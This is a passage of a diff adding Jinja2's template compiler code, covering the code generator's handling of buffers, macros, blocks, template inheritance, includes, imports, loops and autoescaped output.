+ self.has_known_extends = False + + # the current line number + self.code_lineno = 1 + + # registry of all filters and tests (global, not block local) + self.tests: t.Dict[str, str] = {} + self.filters: t.Dict[str, str] = {} + + # the debug information + self.debug_info: t.List[t.Tuple[int, int]] = [] + self._write_debug_info: t.Optional[int] = None + + # the number of new lines before the next write() + self._new_lines = 0 + + # the line number of the last written statement + self._last_line = 0 + + # true if nothing was written so far. + self._first_write = True + + # used by the `temporary_identifier` method to get new + # unique, temporary identifier + self._last_identifier = 0 + + # the current indentation + self._indentation = 0 + + # Tracks toplevel assignments + self._assign_stack: t.List[t.Set[str]] = [] + + # Tracks parameter definition blocks + self._param_def_block: t.List[t.Set[str]] = [] + + # Tracks the current context. + self._context_reference_stack = ["context"] + + @property + def optimized(self) -> bool: + return self.optimizer is not None + + # -- Various compilation helpers + + def fail(self, msg: str, lineno: int) -> "te.NoReturn": + """Fail with a :exc:`TemplateAssertionError`.""" + raise TemplateAssertionError(msg, lineno, self.name, self.filename) + + def temporary_identifier(self) -> str: + """Get a new unique identifier.""" + self._last_identifier += 1 + return f"t_{self._last_identifier}" + + def buffer(self, frame: Frame) -> None: + """Enable buffering for the frame from that point onwards.""" + frame.buffer = self.temporary_identifier() + self.writeline(f"{frame.buffer} = []") + + def return_buffer_contents( + self, frame: Frame, force_unescaped: bool = False + ) -> None: + """Return the buffer contents of the frame.""" + if not force_unescaped: + if frame.eval_ctx.volatile: + self.writeline("if context.eval_ctx.autoescape:") + self.indent() + self.writeline(f"return Markup(concat({frame.buffer}))") + self.outdent() + self.writeline("else:") + self.indent() + self.writeline(f"return concat({frame.buffer})") + self.outdent() + return + elif frame.eval_ctx.autoescape: + self.writeline(f"return Markup(concat({frame.buffer}))") + return + self.writeline(f"return concat({frame.buffer})") + + def indent(self) -> None: + """Indent by one.""" + self._indentation += 1 + + def outdent(self, step: int = 1) -> None: + """Outdent by step.""" + self._indentation -= step + + def start_write(self, frame: Frame, node: t.Optional[nodes.Node] = None) -> None: + """Yield or write into the frame buffer.""" + if frame.buffer is None: + self.writeline("yield ", node) + else: + self.writeline(f"{frame.buffer}.append(", node) + + def end_write(self, frame: Frame) -> None: + """End the writing process started by `start_write`.""" + if frame.buffer is not None: + self.write(")") + + def simple_write( + self, s: str, frame: Frame, node: t.Optional[nodes.Node] = None + ) -> None: + """Simple shortcut for start_write + write + end_write.""" + self.start_write(frame, node) + self.write(s) + self.end_write(frame) + + def blockvisit(self, nodes: t.Iterable[nodes.Node], frame: Frame) -> None: + """Visit a list of nodes as block in a frame. If the current frame + is no buffer a dummy ``if 0: yield None`` is written automatically. 
+ """ + try: + self.writeline("pass") + for node in nodes: + self.visit(node, frame) + except CompilerExit: + pass + + def write(self, x: str) -> None: + """Write a string into the output stream.""" + if self._new_lines: + if not self._first_write: + self.stream.write("\n" * self._new_lines) + self.code_lineno += self._new_lines + if self._write_debug_info is not None: + self.debug_info.append((self._write_debug_info, self.code_lineno)) + self._write_debug_info = None + self._first_write = False + self.stream.write(" " * self._indentation) + self._new_lines = 0 + self.stream.write(x) + + def writeline( + self, x: str, node: t.Optional[nodes.Node] = None, extra: int = 0 + ) -> None: + """Combination of newline and write.""" + self.newline(node, extra) + self.write(x) + + def newline(self, node: t.Optional[nodes.Node] = None, extra: int = 0) -> None: + """Add one or more newlines before the next write.""" + self._new_lines = max(self._new_lines, 1 + extra) + if node is not None and node.lineno != self._last_line: + self._write_debug_info = node.lineno + self._last_line = node.lineno + + def signature( + self, + node: t.Union[nodes.Call, nodes.Filter, nodes.Test], + frame: Frame, + extra_kwargs: t.Optional[t.Mapping[str, t.Any]] = None, + ) -> None: + """Writes a function call to the stream for the current node. + A leading comma is added automatically. The extra keyword + arguments may not include python keywords otherwise a syntax + error could occur. The extra keyword arguments should be given + as python dict. + """ + # if any of the given keyword arguments is a python keyword + # we have to make sure that no invalid call is created. + kwarg_workaround = any( + is_python_keyword(t.cast(str, k)) + for k in chain((x.key for x in node.kwargs), extra_kwargs or ()) + ) + + for arg in node.args: + self.write(", ") + self.visit(arg, frame) + + if not kwarg_workaround: + for kwarg in node.kwargs: + self.write(", ") + self.visit(kwarg, frame) + if extra_kwargs is not None: + for key, value in extra_kwargs.items(): + self.write(f", {key}={value}") + if node.dyn_args: + self.write(", *") + self.visit(node.dyn_args, frame) + + if kwarg_workaround: + if node.dyn_kwargs is not None: + self.write(", **dict({") + else: + self.write(", **{") + for kwarg in node.kwargs: + self.write(f"{kwarg.key!r}: ") + self.visit(kwarg.value, frame) + self.write(", ") + if extra_kwargs is not None: + for key, value in extra_kwargs.items(): + self.write(f"{key!r}: {value}, ") + if node.dyn_kwargs is not None: + self.write("}, **") + self.visit(node.dyn_kwargs, frame) + self.write(")") + else: + self.write("}") + + elif node.dyn_kwargs is not None: + self.write(", **") + self.visit(node.dyn_kwargs, frame) + + def pull_dependencies(self, nodes: t.Iterable[nodes.Node]) -> None: + """Find all filter and test names used in the template and + assign them to variables in the compiled namespace. Checking + that the names are registered with the environment is done when + compiling the Filter and Test nodes. If the node is in an If or + CondExpr node, the check is done at runtime instead. + + .. versionchanged:: 3.0 + Filters and tests in If and CondExpr nodes are checked at + runtime instead of compile time. 
+ """ + visitor = DependencyFinderVisitor() + + for node in nodes: + visitor.visit(node) + + for id_map, names, dependency in (self.filters, visitor.filters, "filters"), ( + self.tests, + visitor.tests, + "tests", + ): + for name in sorted(names): + if name not in id_map: + id_map[name] = self.temporary_identifier() + + # add check during runtime that dependencies used inside of executed + # blocks are defined, as this step may be skipped during compile time + self.writeline("try:") + self.indent() + self.writeline(f"{id_map[name]} = environment.{dependency}[{name!r}]") + self.outdent() + self.writeline("except KeyError:") + self.indent() + self.writeline("@internalcode") + self.writeline(f"def {id_map[name]}(*unused):") + self.indent() + self.writeline( + f'raise TemplateRuntimeError("No {dependency[:-1]}' + f' named {name!r} found.")' + ) + self.outdent() + self.outdent() + + def enter_frame(self, frame: Frame) -> None: + undefs = [] + for target, (action, param) in frame.symbols.loads.items(): + if action == VAR_LOAD_PARAMETER: + pass + elif action == VAR_LOAD_RESOLVE: + self.writeline(f"{target} = {self.get_resolve_func()}({param!r})") + elif action == VAR_LOAD_ALIAS: + self.writeline(f"{target} = {param}") + elif action == VAR_LOAD_UNDEFINED: + undefs.append(target) + else: + raise NotImplementedError("unknown load instruction") + if undefs: + self.writeline(f"{' = '.join(undefs)} = missing") + + def leave_frame(self, frame: Frame, with_python_scope: bool = False) -> None: + if not with_python_scope: + undefs = [] + for target in frame.symbols.loads: + undefs.append(target) + if undefs: + self.writeline(f"{' = '.join(undefs)} = missing") + + def choose_async(self, async_value: str = "async ", sync_value: str = "") -> str: + return async_value if self.environment.is_async else sync_value + + def func(self, name: str) -> str: + return f"{self.choose_async()}def {name}" + + def macro_body( + self, node: t.Union[nodes.Macro, nodes.CallBlock], frame: Frame + ) -> t.Tuple[Frame, MacroRef]: + """Dump the function def of a macro or call block.""" + frame = frame.inner() + frame.symbols.analyze_node(node) + macro_ref = MacroRef(node) + + explicit_caller = None + skip_special_params = set() + args = [] + + for idx, arg in enumerate(node.args): + if arg.name == "caller": + explicit_caller = idx + if arg.name in ("kwargs", "varargs"): + skip_special_params.add(arg.name) + args.append(frame.symbols.ref(arg.name)) + + undeclared = find_undeclared(node.body, ("caller", "kwargs", "varargs")) + + if "caller" in undeclared: + # In older Jinja versions there was a bug that allowed caller + # to retain the special behavior even if it was mentioned in + # the argument list. However thankfully this was only really + # working if it was the last argument. So we are explicitly + # checking this now and error out if it is anywhere else in + # the argument list. 
+ if explicit_caller is not None: + try: + node.defaults[explicit_caller - len(node.args)] + except IndexError: + self.fail( + "When defining macros or call blocks the " + 'special "caller" argument must be omitted ' + "or be given a default.", + node.lineno, + ) + else: + args.append(frame.symbols.declare_parameter("caller")) + macro_ref.accesses_caller = True + if "kwargs" in undeclared and "kwargs" not in skip_special_params: + args.append(frame.symbols.declare_parameter("kwargs")) + macro_ref.accesses_kwargs = True + if "varargs" in undeclared and "varargs" not in skip_special_params: + args.append(frame.symbols.declare_parameter("varargs")) + macro_ref.accesses_varargs = True + + # macros are delayed, they never require output checks + frame.require_output_check = False + frame.symbols.analyze_node(node) + self.writeline(f"{self.func('macro')}({', '.join(args)}):", node) + self.indent() + + self.buffer(frame) + self.enter_frame(frame) + + self.push_parameter_definitions(frame) + for idx, arg in enumerate(node.args): + ref = frame.symbols.ref(arg.name) + self.writeline(f"if {ref} is missing:") + self.indent() + try: + default = node.defaults[idx - len(node.args)] + except IndexError: + self.writeline( + f'{ref} = undefined("parameter {arg.name!r} was not provided",' + f" name={arg.name!r})" + ) + else: + self.writeline(f"{ref} = ") + self.visit(default, frame) + self.mark_parameter_stored(ref) + self.outdent() + self.pop_parameter_definitions() + + self.blockvisit(node.body, frame) + self.return_buffer_contents(frame, force_unescaped=True) + self.leave_frame(frame, with_python_scope=True) + self.outdent() + + return frame, macro_ref + + def macro_def(self, macro_ref: MacroRef, frame: Frame) -> None: + """Dump the macro definition for the def created by macro_body.""" + arg_tuple = ", ".join(repr(x.name) for x in macro_ref.node.args) + name = getattr(macro_ref.node, "name", None) + if len(macro_ref.node.args) == 1: + arg_tuple += "," + self.write( + f"Macro(environment, macro, {name!r}, ({arg_tuple})," + f" {macro_ref.accesses_kwargs!r}, {macro_ref.accesses_varargs!r}," + f" {macro_ref.accesses_caller!r}, context.eval_ctx.autoescape)" + ) + + def position(self, node: nodes.Node) -> str: + """Return a human readable position for the node.""" + rv = f"line {node.lineno}" + if self.name is not None: + rv = f"{rv} in {self.name!r}" + return rv + + def dump_local_context(self, frame: Frame) -> str: + items_kv = ", ".join( + f"{name!r}: {target}" + for name, target in frame.symbols.dump_stores().items() + ) + return f"{{{items_kv}}}" + + def write_commons(self) -> None: + """Writes a common preamble that is used by root and block functions. + Primarily this sets up common local helpers and enforces a generator + through a dead branch. + """ + self.writeline("resolve = context.resolve_or_missing") + self.writeline("undefined = environment.undefined") + self.writeline("concat = environment.concat") + # always use the standard Undefined class for the implicit else of + # conditional expressions + self.writeline("cond_expr_undefined = Undefined") + self.writeline("if 0: yield None") + + def push_parameter_definitions(self, frame: Frame) -> None: + """Pushes all parameter targets from the given frame into a local + stack that permits tracking of yet to be assigned parameters. In + particular this enables the optimization from `visit_Name` to skip + undefined expressions for parameters in macros as macros can reference + otherwise unbound parameters. 
+ """ + self._param_def_block.append(frame.symbols.dump_param_targets()) + + def pop_parameter_definitions(self) -> None: + """Pops the current parameter definitions set.""" + self._param_def_block.pop() + + def mark_parameter_stored(self, target: str) -> None: + """Marks a parameter in the current parameter definitions as stored. + This will skip the enforced undefined checks. + """ + if self._param_def_block: + self._param_def_block[-1].discard(target) + + def push_context_reference(self, target: str) -> None: + self._context_reference_stack.append(target) + + def pop_context_reference(self) -> None: + self._context_reference_stack.pop() + + def get_context_ref(self) -> str: + return self._context_reference_stack[-1] + + def get_resolve_func(self) -> str: + target = self._context_reference_stack[-1] + if target == "context": + return "resolve" + return f"{target}.resolve" + + def derive_context(self, frame: Frame) -> str: + return f"{self.get_context_ref()}.derived({self.dump_local_context(frame)})" + + def parameter_is_undeclared(self, target: str) -> bool: + """Checks if a given target is an undeclared parameter.""" + if not self._param_def_block: + return False + return target in self._param_def_block[-1] + + def push_assign_tracking(self) -> None: + """Pushes a new layer for assignment tracking.""" + self._assign_stack.append(set()) + + def pop_assign_tracking(self, frame: Frame) -> None: + """Pops the topmost level for assignment tracking and updates the + context variables if necessary. + """ + vars = self._assign_stack.pop() + if ( + not frame.block_frame + and not frame.loop_frame + and not frame.toplevel + or not vars + ): + return + public_names = [x for x in vars if x[:1] != "_"] + if len(vars) == 1: + name = next(iter(vars)) + ref = frame.symbols.ref(name) + if frame.loop_frame: + self.writeline(f"_loop_vars[{name!r}] = {ref}") + return + if frame.block_frame: + self.writeline(f"_block_vars[{name!r}] = {ref}") + return + self.writeline(f"context.vars[{name!r}] = {ref}") + else: + if frame.loop_frame: + self.writeline("_loop_vars.update({") + elif frame.block_frame: + self.writeline("_block_vars.update({") + else: + self.writeline("context.vars.update({") + for idx, name in enumerate(vars): + if idx: + self.write(", ") + ref = frame.symbols.ref(name) + self.write(f"{name!r}: {ref}") + self.write("})") + if not frame.block_frame and not frame.loop_frame and public_names: + if len(public_names) == 1: + self.writeline(f"context.exported_vars.add({public_names[0]!r})") + else: + names_str = ", ".join(map(repr, public_names)) + self.writeline(f"context.exported_vars.update(({names_str}))") + + # -- Statement Visitors + + def visit_Template( + self, node: nodes.Template, frame: t.Optional[Frame] = None + ) -> None: + assert frame is None, "no root frame allowed" + eval_ctx = EvalContext(self.environment, self.name) + + from .runtime import exported, async_exported + + if self.environment.is_async: + exported_names = sorted(exported + async_exported) + else: + exported_names = sorted(exported) + + self.writeline("from jinja2.runtime import " + ", ".join(exported_names)) + + # if we want a deferred initialization we cannot move the + # environment into a local name + envenv = "" if self.defer_init else ", environment=environment" + + # do we have an extends tag at all? If not, we can save some + # overhead by just not processing any inheritance code. 
+ have_extends = node.find(nodes.Extends) is not None + + # find all blocks + for block in node.find_all(nodes.Block): + if block.name in self.blocks: + self.fail(f"block {block.name!r} defined twice", block.lineno) + self.blocks[block.name] = block + + # find all imports and import them + for import_ in node.find_all(nodes.ImportedName): + if import_.importname not in self.import_aliases: + imp = import_.importname + self.import_aliases[imp] = alias = self.temporary_identifier() + if "." in imp: + module, obj = imp.rsplit(".", 1) + self.writeline(f"from {module} import {obj} as {alias}") + else: + self.writeline(f"import {imp} as {alias}") + + # add the load name + self.writeline(f"name = {self.name!r}") + + # generate the root render function. + self.writeline( + f"{self.func('root')}(context, missing=missing{envenv}):", extra=1 + ) + self.indent() + self.write_commons() + + # process the root + frame = Frame(eval_ctx) + if "self" in find_undeclared(node.body, ("self",)): + ref = frame.symbols.declare_parameter("self") + self.writeline(f"{ref} = TemplateReference(context)") + frame.symbols.analyze_node(node) + frame.toplevel = frame.rootlevel = True + frame.require_output_check = have_extends and not self.has_known_extends + if have_extends: + self.writeline("parent_template = None") + self.enter_frame(frame) + self.pull_dependencies(node.body) + self.blockvisit(node.body, frame) + self.leave_frame(frame, with_python_scope=True) + self.outdent() + + # make sure that the parent root is called. + if have_extends: + if not self.has_known_extends: + self.indent() + self.writeline("if parent_template is not None:") + self.indent() + if not self.environment.is_async: + self.writeline("yield from parent_template.root_render_func(context)") + else: + self.writeline( + "async for event in parent_template.root_render_func(context):" + ) + self.indent() + self.writeline("yield event") + self.outdent() + self.outdent(1 + (not self.has_known_extends)) + + # at this point we now have the blocks collected and can visit them too. + for name, block in self.blocks.items(): + self.writeline( + f"{self.func('block_' + name)}(context, missing=missing{envenv}):", + block, + 1, + ) + self.indent() + self.write_commons() + # It's important that we do not make this frame a child of the + # toplevel template. This would cause a variety of + # interesting issues with identifier tracking. 
+ block_frame = Frame(eval_ctx) + block_frame.block_frame = True + undeclared = find_undeclared(block.body, ("self", "super")) + if "self" in undeclared: + ref = block_frame.symbols.declare_parameter("self") + self.writeline(f"{ref} = TemplateReference(context)") + if "super" in undeclared: + ref = block_frame.symbols.declare_parameter("super") + self.writeline(f"{ref} = context.super({name!r}, block_{name})") + block_frame.symbols.analyze_node(block) + block_frame.block = name + self.writeline("_block_vars = {}") + self.enter_frame(block_frame) + self.pull_dependencies(block.body) + self.blockvisit(block.body, block_frame) + self.leave_frame(block_frame, with_python_scope=True) + self.outdent() + + blocks_kv_str = ", ".join(f"{x!r}: block_{x}" for x in self.blocks) + self.writeline(f"blocks = {{{blocks_kv_str}}}", extra=1) + debug_kv_str = "&".join(f"{k}={v}" for k, v in self.debug_info) + self.writeline(f"debug_info = {debug_kv_str!r}") + + def visit_Block(self, node: nodes.Block, frame: Frame) -> None: + """Call a block and register it for the template.""" + level = 0 + if frame.toplevel: + # if we know that we are a child template, there is no need to + # check if we are one + if self.has_known_extends: + return + if self.extends_so_far > 0: + self.writeline("if parent_template is None:") + self.indent() + level += 1 + + if node.scoped: + context = self.derive_context(frame) + else: + context = self.get_context_ref() + + if node.required: + self.writeline(f"if len(context.blocks[{node.name!r}]) <= 1:", node) + self.indent() + self.writeline( + f'raise TemplateRuntimeError("Required block {node.name!r} not found")', + node, + ) + self.outdent() + + if not self.environment.is_async and frame.buffer is None: + self.writeline( + f"yield from context.blocks[{node.name!r}][0]({context})", node + ) + else: + self.writeline( + f"{self.choose_async()}for event in" + f" context.blocks[{node.name!r}][0]({context}):", + node, + ) + self.indent() + self.simple_write("event", frame) + self.outdent() + + self.outdent(level) + + def visit_Extends(self, node: nodes.Extends, frame: Frame) -> None: + """Calls the extender.""" + if not frame.toplevel: + self.fail("cannot use extend from a non top-level scope", node.lineno) + + # if the number of extends statements in general is zero so + # far, we don't have to add a check if something extended + # the template before this one. + if self.extends_so_far > 0: + + # if we have a known extends we just add a template runtime + # error into the generated code. We could catch that at compile + # time too, but i welcome it not to confuse users by throwing the + # same error at different times just "because we can". + if not self.has_known_extends: + self.writeline("if parent_template is not None:") + self.indent() + self.writeline('raise TemplateRuntimeError("extended multiple times")') + + # if we have a known extends already we don't need that code here + # as we know that the template execution will end here. 
+ if self.has_known_extends: + raise CompilerExit() + else: + self.outdent() + + self.writeline("parent_template = environment.get_template(", node) + self.visit(node.template, frame) + self.write(f", {self.name!r})") + self.writeline("for name, parent_block in parent_template.blocks.items():") + self.indent() + self.writeline("context.blocks.setdefault(name, []).append(parent_block)") + self.outdent() + + # if this extends statement was in the root level we can take + # advantage of that information and simplify the generated code + # in the top level from this point onwards + if frame.rootlevel: + self.has_known_extends = True + + # and now we have one more + self.extends_so_far += 1 + + def visit_Include(self, node: nodes.Include, frame: Frame) -> None: + """Handles includes.""" + if node.ignore_missing: + self.writeline("try:") + self.indent() + + func_name = "get_or_select_template" + if isinstance(node.template, nodes.Const): + if isinstance(node.template.value, str): + func_name = "get_template" + elif isinstance(node.template.value, (tuple, list)): + func_name = "select_template" + elif isinstance(node.template, (nodes.Tuple, nodes.List)): + func_name = "select_template" + + self.writeline(f"template = environment.{func_name}(", node) + self.visit(node.template, frame) + self.write(f", {self.name!r})") + if node.ignore_missing: + self.outdent() + self.writeline("except TemplateNotFound:") + self.indent() + self.writeline("pass") + self.outdent() + self.writeline("else:") + self.indent() + + skip_event_yield = False + if node.with_context: + self.writeline( + f"{self.choose_async()}for event in template.root_render_func(" + "template.new_context(context.get_all(), True," + f" {self.dump_local_context(frame)})):" + ) + elif self.environment.is_async: + self.writeline( + "for event in (await template._get_default_module_async())" + "._body_stream:" + ) + else: + self.writeline("yield from template._get_default_module()._body_stream") + skip_event_yield = True + + if not skip_event_yield: + self.indent() + self.simple_write("event", frame) + self.outdent() + + if node.ignore_missing: + self.outdent() + + def _import_common( + self, node: t.Union[nodes.Import, nodes.FromImport], frame: Frame + ) -> None: + self.write(f"{self.choose_async('await ')}environment.get_template(") + self.visit(node.template, frame) + self.write(f", {self.name!r}).") + + if node.with_context: + f_name = f"make_module{self.choose_async('_async')}" + self.write( + f"{f_name}(context.get_all(), True, {self.dump_local_context(frame)})" + ) + else: + self.write(f"_get_default_module{self.choose_async('_async')}(context)") + + def visit_Import(self, node: nodes.Import, frame: Frame) -> None: + """Visit regular imports.""" + self.writeline(f"{frame.symbols.ref(node.target)} = ", node) + if frame.toplevel: + self.write(f"context.vars[{node.target!r}] = ") + + self._import_common(node, frame) + + if frame.toplevel and not node.target.startswith("_"): + self.writeline(f"context.exported_vars.discard({node.target!r})") + + def visit_FromImport(self, node: nodes.FromImport, frame: Frame) -> None: + """Visit named imports.""" + self.newline(node) + self.write("included_template = ") + self._import_common(node, frame) + var_names = [] + discarded_names = [] + for name in node.names: + if isinstance(name, tuple): + name, alias = name + else: + alias = name + self.writeline( + f"{frame.symbols.ref(alias)} =" + f" getattr(included_template, {name!r}, missing)" + ) + self.writeline(f"if {frame.symbols.ref(alias)} is missing:") 
+ self.indent() + message = ( + "the template {included_template.__name__!r}" + f" (imported on {self.position(node)})" + f" does not export the requested name {name!r}" + ) + self.writeline( + f"{frame.symbols.ref(alias)} = undefined(f{message!r}, name={name!r})" + ) + self.outdent() + if frame.toplevel: + var_names.append(alias) + if not alias.startswith("_"): + discarded_names.append(alias) + + if var_names: + if len(var_names) == 1: + name = var_names[0] + self.writeline(f"context.vars[{name!r}] = {frame.symbols.ref(name)}") + else: + names_kv = ", ".join( + f"{name!r}: {frame.symbols.ref(name)}" for name in var_names + ) + self.writeline(f"context.vars.update({{{names_kv}}})") + if discarded_names: + if len(discarded_names) == 1: + self.writeline(f"context.exported_vars.discard({discarded_names[0]!r})") + else: + names_str = ", ".join(map(repr, discarded_names)) + self.writeline( + f"context.exported_vars.difference_update(({names_str}))" + ) + + def visit_For(self, node: nodes.For, frame: Frame) -> None: + loop_frame = frame.inner() + loop_frame.loop_frame = True + test_frame = frame.inner() + else_frame = frame.inner() + + # try to figure out if we have an extended loop. An extended loop + # is necessary if the loop is in recursive mode if the special loop + # variable is accessed in the body if the body is a scoped block. + extended_loop = ( + node.recursive + or "loop" + in find_undeclared(node.iter_child_nodes(only=("body",)), ("loop",)) + or any(block.scoped for block in node.find_all(nodes.Block)) + ) + + loop_ref = None + if extended_loop: + loop_ref = loop_frame.symbols.declare_parameter("loop") + + loop_frame.symbols.analyze_node(node, for_branch="body") + if node.else_: + else_frame.symbols.analyze_node(node, for_branch="else") + + if node.test: + loop_filter_func = self.temporary_identifier() + test_frame.symbols.analyze_node(node, for_branch="test") + self.writeline(f"{self.func(loop_filter_func)}(fiter):", node.test) + self.indent() + self.enter_frame(test_frame) + self.writeline(self.choose_async("async for ", "for ")) + self.visit(node.target, loop_frame) + self.write(" in ") + self.write(self.choose_async("auto_aiter(fiter)", "fiter")) + self.write(":") + self.indent() + self.writeline("if ", node.test) + self.visit(node.test, test_frame) + self.write(":") + self.indent() + self.writeline("yield ") + self.visit(node.target, loop_frame) + self.outdent(3) + self.leave_frame(test_frame, with_python_scope=True) + + # if we don't have an recursive loop we have to find the shadowed + # variables at that point. Because loops can be nested but the loop + # variable is a special one we have to enforce aliasing for it. 
+ if node.recursive: + self.writeline( + f"{self.func('loop')}(reciter, loop_render_func, depth=0):", node + ) + self.indent() + self.buffer(loop_frame) + + # Use the same buffer for the else frame + else_frame.buffer = loop_frame.buffer + + # make sure the loop variable is a special one and raise a template + # assertion error if a loop tries to write to loop + if extended_loop: + self.writeline(f"{loop_ref} = missing") + + for name in node.find_all(nodes.Name): + if name.ctx == "store" and name.name == "loop": + self.fail( + "Can't assign to special loop variable in for-loop target", + name.lineno, + ) + + if node.else_: + iteration_indicator = self.temporary_identifier() + self.writeline(f"{iteration_indicator} = 1") + + self.writeline(self.choose_async("async for ", "for "), node) + self.visit(node.target, loop_frame) + if extended_loop: + self.write(f", {loop_ref} in {self.choose_async('Async')}LoopContext(") + else: + self.write(" in ") + + if node.test: + self.write(f"{loop_filter_func}(") + if node.recursive: + self.write("reciter") + else: + if self.environment.is_async and not extended_loop: + self.write("auto_aiter(") + self.visit(node.iter, frame) + if self.environment.is_async and not extended_loop: + self.write(")") + if node.test: + self.write(")") + + if node.recursive: + self.write(", undefined, loop_render_func, depth):") + else: + self.write(", undefined):" if extended_loop else ":") + + self.indent() + self.enter_frame(loop_frame) + + self.writeline("_loop_vars = {}") + self.blockvisit(node.body, loop_frame) + if node.else_: + self.writeline(f"{iteration_indicator} = 0") + self.outdent() + self.leave_frame( + loop_frame, with_python_scope=node.recursive and not node.else_ + ) + + if node.else_: + self.writeline(f"if {iteration_indicator}:") + self.indent() + self.enter_frame(else_frame) + self.blockvisit(node.else_, else_frame) + self.leave_frame(else_frame) + self.outdent() + + # if the node was recursive we have to return the buffer contents + # and start the iteration code + if node.recursive: + self.return_buffer_contents(loop_frame) + self.outdent() + self.start_write(frame, node) + self.write(f"{self.choose_async('await ')}loop(") + if self.environment.is_async: + self.write("auto_aiter(") + self.visit(node.iter, frame) + if self.environment.is_async: + self.write(")") + self.write(", loop)") + self.end_write(frame) + + # at the end of the iteration, clear any assignments made in the + # loop from the top level + if self._assign_stack: + self._assign_stack[-1].difference_update(loop_frame.symbols.stores) + + def visit_If(self, node: nodes.If, frame: Frame) -> None: + if_frame = frame.soft() + self.writeline("if ", node) + self.visit(node.test, if_frame) + self.write(":") + self.indent() + self.blockvisit(node.body, if_frame) + self.outdent() + for elif_ in node.elif_: + self.writeline("elif ", elif_) + self.visit(elif_.test, if_frame) + self.write(":") + self.indent() + self.blockvisit(elif_.body, if_frame) + self.outdent() + if node.else_: + self.writeline("else:") + self.indent() + self.blockvisit(node.else_, if_frame) + self.outdent() + + def visit_Macro(self, node: nodes.Macro, frame: Frame) -> None: + macro_frame, macro_ref = self.macro_body(node, frame) + self.newline() + if frame.toplevel: + if not node.name.startswith("_"): + self.write(f"context.exported_vars.add({node.name!r})") + self.writeline(f"context.vars[{node.name!r}] = ") + self.write(f"{frame.symbols.ref(node.name)} = ") + self.macro_def(macro_ref, macro_frame) + + def visit_CallBlock(self, 
node: nodes.CallBlock, frame: Frame) -> None: + call_frame, macro_ref = self.macro_body(node, frame) + self.writeline("caller = ") + self.macro_def(macro_ref, call_frame) + self.start_write(frame, node) + self.visit_Call(node.call, frame, forward_caller=True) + self.end_write(frame) + + def visit_FilterBlock(self, node: nodes.FilterBlock, frame: Frame) -> None: + filter_frame = frame.inner() + filter_frame.symbols.analyze_node(node) + self.enter_frame(filter_frame) + self.buffer(filter_frame) + self.blockvisit(node.body, filter_frame) + self.start_write(frame, node) + self.visit_Filter(node.filter, filter_frame) + self.end_write(frame) + self.leave_frame(filter_frame) + + def visit_With(self, node: nodes.With, frame: Frame) -> None: + with_frame = frame.inner() + with_frame.symbols.analyze_node(node) + self.enter_frame(with_frame) + for target, expr in zip(node.targets, node.values): + self.newline() + self.visit(target, with_frame) + self.write(" = ") + self.visit(expr, frame) + self.blockvisit(node.body, with_frame) + self.leave_frame(with_frame) + + def visit_ExprStmt(self, node: nodes.ExprStmt, frame: Frame) -> None: + self.newline(node) + self.visit(node.node, frame) + + class _FinalizeInfo(t.NamedTuple): + const: t.Optional[t.Callable[..., str]] + src: t.Optional[str] + + @staticmethod + def _default_finalize(value: t.Any) -> t.Any: + """The default finalize function if the environment isn't + configured with one. Or, if the environment has one, this is + called on that function's output for constants. + """ + return str(value) + + _finalize: t.Optional[_FinalizeInfo] = None + + def _make_finalize(self) -> _FinalizeInfo: + """Build the finalize function to be used on constants and at + runtime. Cached so it's only created once for all output nodes. + + Returns a ``namedtuple`` with the following attributes: + + ``const`` + A function to finalize constant data at compile time. + + ``src`` + Source code to output around nodes to be evaluated at + runtime. + """ + if self._finalize is not None: + return self._finalize + + finalize: t.Optional[t.Callable[..., t.Any]] + finalize = default = self._default_finalize + src = None + + if self.environment.finalize: + src = "environment.finalize(" + env_finalize = self.environment.finalize + pass_arg = { + _PassArg.context: "context", + _PassArg.eval_context: "context.eval_ctx", + _PassArg.environment: "environment", + }.get( + _PassArg.from_obj(env_finalize) # type: ignore + ) + finalize = None + + if pass_arg is None: + + def finalize(value: t.Any) -> t.Any: + return default(env_finalize(value)) + + else: + src = f"{src}{pass_arg}, " + + if pass_arg == "environment": + + def finalize(value: t.Any) -> t.Any: + return default(env_finalize(self.environment, value)) + + self._finalize = self._FinalizeInfo(finalize, src) + return self._finalize + + def _output_const_repr(self, group: t.Iterable[t.Any]) -> str: + """Given a group of constant values converted from ``Output`` + child nodes, produce a string to write to the template module + source. + """ + return repr(concat(group)) + + def _output_child_to_const( + self, node: nodes.Expr, frame: Frame, finalize: _FinalizeInfo + ) -> str: + """Try to optimize a child of an ``Output`` node by trying to + convert it to constant, finalized data at compile time. + + If :exc:`Impossible` is raised, the node is not constant and + will be evaluated at runtime. Any other exception will also be + evaluated at runtime for easier debugging. 
+ """ + const = node.as_const(frame.eval_ctx) + + if frame.eval_ctx.autoescape: + const = escape(const) + + # Template data doesn't go through finalize. + if isinstance(node, nodes.TemplateData): + return str(const) + + return finalize.const(const) # type: ignore + + def _output_child_pre( + self, node: nodes.Expr, frame: Frame, finalize: _FinalizeInfo + ) -> None: + """Output extra source code before visiting a child of an + ``Output`` node. + """ + if frame.eval_ctx.volatile: + self.write("(escape if context.eval_ctx.autoescape else str)(") + elif frame.eval_ctx.autoescape: + self.write("escape(") + else: + self.write("str(") + + if finalize.src is not None: + self.write(finalize.src) + + def _output_child_post( + self, node: nodes.Expr, frame: Frame, finalize: _FinalizeInfo + ) -> None: + """Output extra source code after visiting a child of an + ``Output`` node. + """ + self.write(")") + + if finalize.src is not None: + self.write(")") + + def visit_Output(self, node: nodes.Output, frame: Frame) -> None: + # If an extends is active, don't render outside a block. + if frame.require_output_check: + # A top-level extends is known to exist at compile time. + if self.has_known_extends: + return + + self.writeline("if parent_template is None:") + self.indent() + + finalize = self._make_finalize() + body: t.List[t.Union[t.List[t.Any], nodes.Expr]] = [] + + # Evaluate constants at compile time if possible. Each item in + # body will be either a list of static data or a node to be + # evaluated at runtime. + for child in node.nodes: + try: + if not ( + # If the finalize function requires runtime context, + # constants can't be evaluated at compile time. + finalize.const + # Unless it's basic template data that won't be + # finalized anyway. + or isinstance(child, nodes.TemplateData) + ): + raise nodes.Impossible() + + const = self._output_child_to_const(child, frame, finalize) + except (nodes.Impossible, Exception): + # The node was not constant and needs to be evaluated at + # runtime. Or another error was raised, which is easier + # to debug at runtime. + body.append(child) + continue + + if body and isinstance(body[-1], list): + body[-1].append(const) + else: + body.append([const]) + + if frame.buffer is not None: + if len(body) == 1: + self.writeline(f"{frame.buffer}.append(") + else: + self.writeline(f"{frame.buffer}.extend((") + + self.indent() + + for item in body: + if isinstance(item, list): + # A group of constant data to join and output. + val = self._output_const_repr(item) + + if frame.buffer is None: + self.writeline("yield " + val) + else: + 